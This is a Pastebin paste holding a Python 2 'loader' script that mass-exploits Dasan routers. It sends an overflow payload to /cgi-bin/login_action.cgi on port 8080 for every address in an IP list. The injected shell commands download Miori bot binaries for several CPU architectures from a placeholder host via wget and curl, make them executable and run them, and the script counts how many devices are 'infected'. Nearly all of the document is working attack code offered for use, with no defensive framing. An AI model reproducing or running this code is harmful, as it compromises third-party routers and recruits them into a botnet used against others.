Advertisement
miraip0ts

dasan router loader

Mar 16th, 2018
4,905
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.41 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. #nexus zeta is big 0 day exploiter 10/10
  4. import sys, socket, json, time, ssl, struct, os
  5. from threading import Thread
  6. if len(sys.argv) < 2:
  7.     print "Usage: python "+sys.argv[0]+" <list>"
  8.     sys.exit()
  9. port = 8080
  10. buf = 4096
  11. pre_pl0 = 0x2ad0c000
  12. pre_pl2 = pre_pl0 + 0x00115d40
  13. pl2 = struct.pack(">i",pre_pl2)
  14. pre_pl3 = pre_pl0 + 0x0003CC9C
  15. pl3 =  struct.pack(">i",pre_pl3)
  16.  
  17. payload = "/bin/sh wget http://IP/miori.mips; curl -O http://IP/miori.mips cat miori.mips >fwergf; chmod 777 fwergf; ./fwergf senpai.dasan"
  18. payload2 = "/bin/sh wget http://IP/miori.mpsl; curl -O http://IP/miori.mpsl cat miori.mpsl >fwerg; chmod 777 fwerg; ./fwerg senpai.dasan"
  19. payload3 = "/bin/sh wget http://IP/miori.x86; curl -O http://IP/miori.x86 cat miori.x86 >fwer; chmod 777 fwer; ./fwer senpai.dasan"
  20. payload4 = "/bin/sh wget http://IP/miori.arm7; curl -O http://IP/miori.arm7 cat miori.arm7 >fwe; chmod 777 fwe; ./fwe senpai.dasan"
  21. pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
  22. pre_data2 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload2
  23. pre_data3 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload3
  24. pre_data4 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload4
  25. post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  26. post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  27. post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  28. post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  29. headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  30. headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)
  31. headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)
  32. headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)
  33. i = 0
  34. ips = open(sys.argv[1]).readlines()
  35.  
  36. def dasan(host):
  37.     global i
  38.     host = host.strip("\n")
  39.     try:
  40.         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  41.         s = ssl.wrap_socket(sock)
  42.         s.connect((host, port))
  43.         s.send(headers)
  44.         s.send(headers2)
  45.         s.send(headers3)
  46.         resp = s.recv(buf).strip()
  47.         if "200 OK" in resp:
  48.             i += 1
  49.         s.close()
  50.     except:
  51.         pass
  52.        
  53. def worker():
  54.     for ip in ips:
  55.         try:
  56.             ip = ip.strip("\r\n")
  57.             t = Thread(target=dasan, args=(ip,))
  58.             t.start()
  59.             time.sleep(0.01)
  60.         except:
  61.             pass
  62.     time.sleep(30)
  63.     sys.exit("Finished Scanning")
  64. workerthrd = Thread(target=worker)
  65. workerthrd.start()
  66. print headers
  67. while True:
  68.     try:
  69.         sent = i
  70.         sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
  71.         sys.stdout.flush()
  72.         time.sleep(1)
  73.     except KeyboardInterrupt:
  74.         sys.exit("Exiting On User Input")
  75.     except:
  76.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement